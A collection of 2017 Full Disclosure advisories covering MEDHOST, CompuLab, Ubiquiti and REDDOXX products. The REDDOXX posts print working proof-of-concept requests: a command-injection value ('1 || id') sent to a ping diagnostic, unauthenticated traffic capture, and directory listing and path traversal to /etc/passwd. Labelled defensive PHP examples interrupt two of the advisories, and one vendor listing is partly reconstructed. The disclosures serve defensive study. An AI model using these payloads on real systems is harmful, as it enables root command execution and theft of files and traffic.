[FD] MEDHOST Connex contains hard-coded database credentials

2017-07-24 Thread Allen F
Overview


MEDHOST Connex for all versions contains hard-coded credentials that are
used for customer database access. This is a new vulnerability not related
to CVE-2016-4328.

Description


MEDHOST Connex contains hard-coded credentials that are used for customer
database access. An attacker with knowledge of the hard-coded credentials
and the ability to communicate directly with the database may be able to
obtain or modify sensitive patient and financial information.

Connex utilizes an IBM i DB2 user account for database access. The account
name is HMSCXPDN.
This password is hard-coded in multiple places of the application.
Customers do not have the option to change this password. The account has
elevated DB2 roles, and can access all objects or database tables on the
customer DB2 database. This account can access data through ODBC, FTP, and
Telnet.

Customers without Connex installed are still vulnerable. The MEDHOST setup
program creates this account. Connex provides connectivity to exchange
clinical information with the MEDHOST application. /1

Impact


An attacker with knowledge of the hard-coded credentials and the ability to
communicate directly with the application database server may be able to
obtain or modify patient and financial information.

Solution


The vendor has not issued a patch and has been unresponsive to this
information after 3 attempts to communicate.

Restrict network access

As a general security practice, only allow connections from trusted hosts
and networks. Restricting access would prevent an attacker from using the
hard-coded database credentials from a blocked network location.

References

/1 http://www.clinical-innovation.com/topics/health-it/himss-hms-launches-hms-connex-showcase-ambulatory-ehr

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Faraday v2.6: Collaborative Penetration Test and Vulnerability Management Platform

2017-07-24 Thread Francisco Amato
Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that helps users improve their
own work, the main purpose is to re-use the available tools in the
community taking advantage of them in a collaborative way!

Check out the Faraday project in Github.
https://github.com/infobyte/faraday

In the last couple of versions we added several features to allow our
users to manage more and more parts of their engagements directly from
our platform so we realized, why not also add the option to manage
methodologies and tasks? And so we did!

* Kanban Tasks View:

Now you can create your custom methodologies, add tasks, tag them and
keep track of your whole project directly from Faraday.

* Improving the Data Analysis tools:

As per your requests, we made some changes to the existing Data
Analysis tools introduced in the last release. We added the
possibility to change data configuration in order to customize charts,
a new bar chart type to show most vulnerable services and a filter for
undefined or null values.

* Executive Report clean up:

Some users reported issues with the sorting of Hosts and Evidence in
the reports. We fixed it so the hosts in grouped reports are sorted by
IP and evidence is sorted alphabetically by name.

We know sometimes it is necessary to use special characters for
evidence names. Some of our users

* Web UI:

Now you can manually create the same vulnerability in several hosts at
once! Select as many targets as you want when creating your vulns.

 - Add vuln to multiple targets at once

Also, we made the vulnerability creation modal more consistent with
the rest of the views by starting the pagination of the targets in
page 1 instead of 0.

Changes:

- Improved Data analysis charts. Added more chart properties and data binding
- Improved target ordering in grouped reports
- Fixed bug with new line character in reports DOCX
- Adds alphabetical sort for Evidence in the Executive Report
- Fix bug updating users with no roles
- Fixed report creation with evidence names containing special chars
- Added Tasks Management to the Web UI
- Added the ability to select more than one target when creating a vuln in the Web UI
- Merged PR #182 - problems with zonatransfer.me
- Fixed bug in Download CSV of Status report with old versions of Firefox
- Fixed formula injection vulnerability in export to CSV feature
- Fixed DOM-based XSS in the Top Services widget of the dashboard
- Fix in AppScan plugin
- Fix HTML injection in Vulnerability template
- Add new plugin: Junit XML
- Improved pagination in new vuln modal of status report
- Added "Policy Violations" field for Vulnerabilities

We hope you enjoy it, and let us know if you have any questions or comments.

Come to #BHUSA - Mandalay Bay - Business Hall (July 26th - 27th)
We will be at booth IC43
https://www.blackhat.com/us-17/event-sponsors.html#faraday

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas



[FD] CVE-2017-9457 CompuLab Intense PC lacks firmware signature validation

2017-07-24 Thread Hal Martin
Credits: Hal Martin
Website: watchmysys.com
Source: https://watchmysys.com/blog/2017/07/cve-2017-9457-compulab-intense-pc-lacks-firmware-validation/


Vendor:

CompuLab (compulab.com)


Product:

Intense PC / MintBox 2


Vulnerability type:

Platform lacks signature verification and does not validate firmware update before flashing


CVE Reference:

CVE-2017-9457


Summary:

Since 2013 CompuLab has manufactured and sold the Intense PC (also sold under 
the name "MintBox 2"), which is a small Intel-based fanless PC sold to end-users 
and industrial customers. It was discovered that there is no signature 
validation of the UEFI firmware update file before flashing, allowing an 
attacker to silently flash a modified UEFI firmware using the standard 
Phoenix update utility.

CompuLab have indicated via email that capsule signature validation is disabled 
by default by the IBV (Phoenix) for this platform. No timeline was provided to 
implement capsule signature verification.


Affected versions:

All firmware versions since product release (latest public firmware is 21 May 
2017)


Attack Vector:

An attacker tricks the user into running a malicious executable with local 
administrator privileges, which updates the system firmware to include the 
attacker's code. The attacker may instead use a known OS exploit to perform the 
upgrade remotely (without user interaction or notification).


Proof of concept:

I have created a modified firmware update which replaces the stock UEFI shell 
with the UEFI shell from EDK2. The update can be flashed from within Windows 
without any user interaction or notification. Firmware updates are not signed 
by CompuLab or verified by the existing firmware before upgrade.

The modified update, based on the 21 May 2017 firmware, can be downloaded here: 
https://watchmysys.com/blog/wp-content/uploads/2017/07/update-IPC-20170521-edk2.zip

Details of the full proof of concept can be found at the Source link above.


Mitigation:

At this time there is no means for the end user to enable Capsule Signature 
verification or to prevent the Phoenix update utility from updating the system 
firmware.

Therefore Intense PC owners should consider the following options:

- Ensure your operating system is up to date with the latest security patches. 
Do not run software from untrusted sources.
- Do not connect your Intense PC to any networks with internet access (i.e. 
air-gap the computer).
- Discontinue your use of the Intense PC and consider replacing the computer 
with one from a different manufacturer who implements signature validation for 
firmware updates.


Disclosure timeline:

6 June 2017: Issue reported to CompuLab
6 June 2017: CompuLab confirms that “Default settings of this source tree 
[Phoenix SecureCore Tiano Enhanced Intel Ivy Bridge CPU Panther Point M] has 
disabled Capsule Signature option.”
6 June 2017: Issue is reported to MITRE
6 June 2017: Vulnerability is assigned CVE-2017-9457
7 June 2017: CompuLab are informed that the vulnerability has been assigned 
CVE-2017-9457 and details of the vulnerability will be published after 45 days
22 July 2017: Details of the vulnerability are published


[FD] SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products

2017-07-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
=======================================================================
              title: Open Redirect in Login Page
            product: Multiple Ubiquiti Networks products, e.g.
                     TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
                     AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
                     AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
                     BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
                     locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
                     NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
                     NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
                     Power AP N
 vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
      fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
         CVE number:
             impact: Low
           homepage: https://www.ubnt.com/
              found: 2017-03-22
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:

SEC Consult recommends not to use the devices in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Open Redirect in Login Page - HackerOne #158287
An open redirect vulnerability can be triggered by luring an attacked user to
authenticate to a Ubiquiti AirOS device by clicking on a crafted link.
This vulnerability was found earlier by another bug bounty participant
on HackerOne. It was numbered with #158287.

Proof of concept:
-
http:///login.cgi?uri=https://www.sec-consult.com

After a successful login, the user will be redirected to

https://www.sec-consult.com.

Vulnerable / tested versions:
-
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)

Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)

Vendor contact timeline:

2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate of #158287.
The contact also states that this issue will be resolved
in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor
and confirmed the fix - provide at least 90 days for
customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-07-24.
2017-07-24: Public release of security advisory

Solution:
-
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of 
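
The following is an added example, not code from Ubiquiti or from SEC Consult: a same-site check for a post-login redirect target of the kind the advisory above describes. Only the parameter name "uri" comes from the advisory's proof-of-concept URL; the function name, the default landing page and the sample inputs are assumptions. It refuses absolute URLs, protocol-relative URLs, backslash variants and header-injection characters, and falls back to a fixed page in every doubtful case.

```php
<?php
// Added example (not Ubiquiti or SEC Consult code): validate the "uri"
// parameter before issuing a Location header after login.

/**
 * Return $uri if it is a plain, site-local path, otherwise $default.
 * Anything that carries a scheme, an authority, or looks like a
 * protocol-relative URL ("//host", "/\host") is refused.
 */
function safe_redirect_target(?string $uri, string $default = '/index.cgi'): string
{
    if ($uri === null || $uri === '') {
        return $default;
    }
    // CR/LF or other control characters in a Location header would allow
    // header injection; refuse them outright.
    if (preg_match('/[\x00-\x1f\x7f]/', $uri)) {
        return $default;
    }
    // parse_url() reports a scheme or a host for absolute URLs
    // ("https://evil", "javascript:...") and protocol-relative ones ("//evil").
    $parts = parse_url($uri);
    if ($parts === false
        || isset($parts['scheme']) || isset($parts['host'])
        || isset($parts['user'])   || isset($parts['pass'])) {
        return $default;
    }
    // Exactly one leading slash, and no backslash anywhere: some browsers
    // treat "/\evil" the same as "//evil".
    if (!preg_match('#^/(?!/)#', $uri) || strpos($uri, '\\') !== false) {
        return $default;
    }
    return $uri;
}

// Constructed inputs; the second is the advisory's proof-of-concept value.
$cases = [
    '/status.cgi?tab=1',
    'https://www.sec-consult.com',
    '//www.sec-consult.com/',
    '/\\www.sec-consult.com',
    "/x\r\nSet-Cookie: a=b",
    '',
];
foreach ($cases as $c) {
    printf("%-34s -> %s\n", json_encode($c), safe_redirect_target($c));
}
```

Only the first input is returned unchanged; every other case resolves to the default page. A login handler would call `header('Location: ' . safe_redirect_target($_GET['uri'] ?? null))` instead of echoing the parameter back.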

[FD] SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products

2017-07-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
=======================================================================
              title: Cross-Site Scripting (XSS)
            product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
 vulnerable version: Firmware v1.9.1
      fixed version: Firmware v1.9.1.1
         CVE number:
             impact: Medium
           homepage: https://www.ubnt.com
              found: 2017-04-04
                 by: R. Freingruber, T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the
integrated XSS filter of Internet Explorer.

A reflected cross site scripting vulnerability was identified because of an
initialization error in "/files/index/". An attacker can exploit this
vulnerability by tricking a victim into visiting a malicious website. The
attacker is able to hijack the session of the attacked user. If the user is
currently not logged in, the injected JavaScript code can start a brute-force
attack (for example, with the default credentials ubnt:ubnt). After a session
has been established, the code has full control over the system via the CLI
feature, which is basically a shell wrapper. By abusing this vulnerability an
attacker can open ports on the router or start a reverse shell.

Proof of concept:
-
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:

https://192.168.1.1/files/index/0/aaa

[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Remote Command Execution as root in REDDOXX Appliance

RedTeam Pentesting discovered a remote command execution vulnerability
in the REDDOXX appliance software, which allows attackers to execute
arbitrary commands with root privileges while unauthenticated.


Details
===

Product: REDDOXX Appliance
Affected Versions: <= Build 2032 / v2.0.625
Fixed Versions: Version 2032 SP2
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Ping is one of these tools.
The interface for this tool contains two input fields, which allow users
to specify a target host and a packet count. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze how these commands
are embedded into the command-line of the ping command:


function ExecuteDiag($parameter)
{
    // Here we do the main thing ...
    // targetHost is wrapped in single quotes; count is concatenated as-is
    $cmd = "ping '" . $parameter->targetHost . "' -c " . $parameter->count;

    $this->PrintHeader();
    $this->PrintHeadLine(array('Result Message', 'Status'));
    $this->PrintOut("");

    $this->PrintOut("");
    passthru($cmd, $rc);
    $this->PrintOut("");

    $this->PrintStatus($rc);
    $this->PrintOut("");
    $this->PrintEnd();

    $result = new stdClass;
    $result->ResultCode = $rc;
    $result->MessageText = "";

    $this->SaveResult($result);
}


As can be seen in the listing above, the parameters are embedded into a
string stored in the variable $cmd. The target host parameter is
surrounded with single quotes, while the count parameter is not.

Before the parameters are actually embedded into the ping command-line
however, the following function performs a check for "illegal
characters":


public static function CheckShellParameter($parameter, $key = "")
{
    if (!is_array($parameter))
        $parameter = array($parameter);

    // deny-list: only these five characters are rejected
    foreach ($parameter as $value) {
        if (preg_match("/[';<>\"]/", $value)) {
            $paramNameMsg = "";
            if ($key)
                $paramNameMsg = " in parameter '$key'";
            throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1);
        }
    }
}


These are characters which can be used to append additional commands to
the command line. While this check prevents certain kinds of attacks, it
is incomplete and can therefore be bypassed. For example, && (AND) and
|| (OR) operators can still be used to append additional commands to the
command-line. Submitting a target host of "127.0.0.1" and a count
of "1 || id" leads to the following command-line being passed to the PHP
passthru() function and executed:


ping '127.0.0.1' -c 1 || id


This causes the command "id" to be executed after the execution of the
ping command is completed.


Proof of Concept


The following curl command-lines can be used to trigger the
vulnerability.

First, the diagnose function ping is called as follows:


$ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",'\
'"Parameter":{"targetHost":"127.0.0.1","count":"1'\
'&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' \
http://www.example.com/api/v1/rws/diagnose/start


Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl
command-line:
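
The following is an added example, not REDDOXX code and not part of the RedTeam Pentesting advisory above: a hardened counterpart to the ExecuteDiag() listing. The deny-list of five characters in CheckShellParameter() is replaced by an allow-list per parameter (an IP literal or host name for targetHost, a bounded unsigned integer for count), and the host is additionally wrapped in escapeshellarg(). Only the two parameter names are taken from the advisory; the function names, the count limit and the sample requests are assumptions.

```php
<?php
// Added example (not REDDOXX or RedTeam Pentesting code): allow-list
// validation of the ping parameters instead of a character deny-list.

final class DiagParameterError extends InvalidArgumentException {}

/** Accept an IP literal or an RFC 1123 host name, nothing else. */
function validate_target_host(string $host): string
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // labels of 1..63 alphanumerics/hyphens, no leading or trailing hyphen
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    if (strlen($host) <= 253 && preg_match("/^$label(\\.$label)*$/", $host)) {
        return $host;
    }
    throw new DiagParameterError("Invalid value in parameter 'targetHost'.");
}

/** Accept only an unsigned decimal integer in a sane range; "1 || id" fails here. */
function validate_count($count): int
{
    $s = is_int($count) ? (string) $count : (is_string($count) ? $count : '');
    if (!ctype_digit($s) || (int) $s < 1 || (int) $s > 20) {
        throw new DiagParameterError("Invalid value in parameter 'count'.");
    }
    return (int) $s;
}

/**
 * Build the ping command line from the request object. A validated host
 * cannot start with "-" and so cannot be read as an option, and
 * escapeshellarg() keeps it a single shell word whatever it contains.
 */
function build_ping_command(object $parameter): string
{
    $host  = validate_target_host((string) ($parameter->targetHost ?? ''));
    $count = validate_count($parameter->count ?? '');
    return 'ping -c ' . $count . ' ' . escapeshellarg($host);
}

// Constructed requests: one benign, then the payload shapes from the advisory.
$requests = [
    ['targetHost' => '127.0.0.1', 'count' => '4'],
    ['targetHost' => '127.0.0.1', 'count' => '1 || id'],
    ['targetHost' => '127.0.0.1', 'count' => "1 && echo 'REDTEAM_MARKER_START' && id"],
    ['targetHost' => 'host;id',   'count' => '1'],
];
foreach ($requests as $r) {
    try {
        echo build_ping_command((object) $r), "\n";
    } catch (DiagParameterError $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
// The real handler would hand the returned string to passthru(); here it is
// only printed.
```

Only the first request yields a command line (`ping -c 4 '127.0.0.1'`); the other three are rejected before any string is built. The point of the change is that validation decides what a value may look like rather than which characters it may not contain, so operators such as `&&`, `||`, backticks or newlines never need to be enumerated.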


[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
capture network traffic on the appliance's interfaces.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Tcpdump is one of these
tools. This tool can be used to capture network traffic on local
interfaces.

During a penetration test, it was discovered that this function, as well
as the other diagnostic functions, does not require authentication.


Proof of Concept


The following curl command-line can be used to start the capture
process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
http://www.example.com/api/v1/rws/diagnose/start
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


The following curl command-line stops the capture process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump"}' \
http://www.example.com/api/v1/rws/diagnose/stop
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


After the capture process is complete, the resulting capture file can be
downloaded without authentication:


$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
[...]
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: ‘tcpdump.cap’
tcpdump.cap 100%[===>] 1.72M [...]
2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]


None of these requests contain any credentials or cookies, which could
provide authentication.


Workaround
==========

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=============

The diagnostic functions of the REDDOXX appliance can be used without
authentication. This allows attackers to, for example, capture network
traffic. During a penetration test it was possible to capture multiple
emails and also POP3 login attempts with cleartext credentials. This is
rated as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==========

[0] https://www.reddoxx.com/en/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure vulnerability
in the REDDOXX appliance software, which allows unauthenticated
attackers to list directory contents and download arbitrary files from
the affected system with root permissions.

Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


When using the user frontend of the REDDOXX appliance [0] reachable via
http://www.example.com/rws/user/, HTTP POST requests are used to perform
certain actions. For example, the following request is used to save the
settings of the current user's profile:


POST /RdxEngine/json HTTP/1.1
Host: www.example.com
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close

{
    "method": "CoreService.SaveUserProfile",
    "params": {
        "Profile": {
            "UseHtmlMail": true,
            "DefaultArchiveDisplayPeriode": "5",
            "ReportLanguage": "en",
            "EnableQueueReport": true
        }
    },
    "id": "{----}"
}


Through analysis of the .NET binaries pertaining to this endpoint,
extracted from the appliance ISO offered on the vendor's homepage [1],
the methods handling these requests were examined. For the
"SaveUserProfile" method, which is specified through the POST parameter
"method", the code is as follows:


// Reddoxx.Api.Legacy.CoreServiceService
public void SaveUserProfile(TRoUserProfile Profile)
{
    try
    {
        this.client.OnStartRequest("CoreService", "SaveUserProfile");
        this.Service.SaveUserProfile(Profile);
        this.client.OnEndRequest("CoreService", "SaveUserProfile");
    }
    catch (System.Exception e)
    {
        this.client.HandleException("CoreService", "SaveUserProfile", e);
    }
}


The "TRoUserProfile" class contains information about the parameters
that are required for valid requests to this method:


namespace Reddoxx.Api.Legacy
{
    [...]
    public class TRoUserProfile : ComplexType
    {
        private string __ReportLanguage;

        private int __DefaultArchiveDisplayPeriode;

        private bool __EnableQueueReport;

        private bool __UseHtmlMail;

        [...]
    }
}


These variable names correspond to the POST parameters contained in the
request that was created when the profile was saved. With this knowledge
about how methods are called and parameters are passed, it was attempted
to call other methods from different packages. It was determined that it
is possible to access certain methods which allow reading arbitrary
files and directory listings.

It was later discovered that the process handling requests to the
vulnerable methods runs with root privileges.


Proof of Concept


At least two methods are found to be of interest for attackers:
FileTransfer.GetDirectoryList, which returns a directory listing for a
path specified via a parameter, and FileTransfer.DownloadFile, which
returns the file specified via a parameter in Base64-encoded form. The
following curl command-lines can be used to call the respective methods:


$ curl --silent --data-binary '{"id":"{----}",'\
'"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"

[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure
vulnerability in the REDDOXX appliance software, which allows
unauthenticated attackers to download arbitrary files from the affected
system.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The REDDOXX appliance [0] contains a PHP script called download.php. It
is available at http://www.example.com/download.php in normal
installations and resides at /opt/reddoxx/local/htdocs/download.php in
the local filesystem of the appliance. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze this file and any
other file in a typical REDDOXX appliance installation.

The file contains the following source code (shortened to relevant
sections):


<?php
// The opening lines are cut off in this copy of the advisory; they are
// reconstructed here from the description that follows the listing: the
// "file" URL parameter is read into $fileName.
$fileName = isset($_GET['file']) ? $_GET['file'] : '';
$file = '';
$fileID = '';
if ($fileName != '') {
    $file = $fileName;
    $fileID = basename($fileName);
}

// Currently we only allow downloads from session directories
// (substring check only; ".." segments are not considered)
if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&
    (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {
    die('File is not in session directory: ' . $file);
}

if(!file_exists($file))
{
    [...]
}
else
{
    // Set headers
    header('Pragma: public');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: private' ,false);

    header('Content-Description: File Transfer');
    header('Content-Disposition: attachment; filename="' . $fileID. '"');
    header('Content-Type: application/octet-stream');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));

    // Read the file from disk
    readfile($file);
}
?>


The script expects a URL parameter called "file" and stores its value in
the variable $fileName. The value of this variable is then copied to the
variable $file, which undergoes two different checks: First, the
function strpos() is used to check whether a certain substring is
contained in the value of the variable. The second check uses the function
file_exists() to determine whether the file specified in the variable is
present in the filesystem.

In order to circumvent the first check, a path such as


/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd


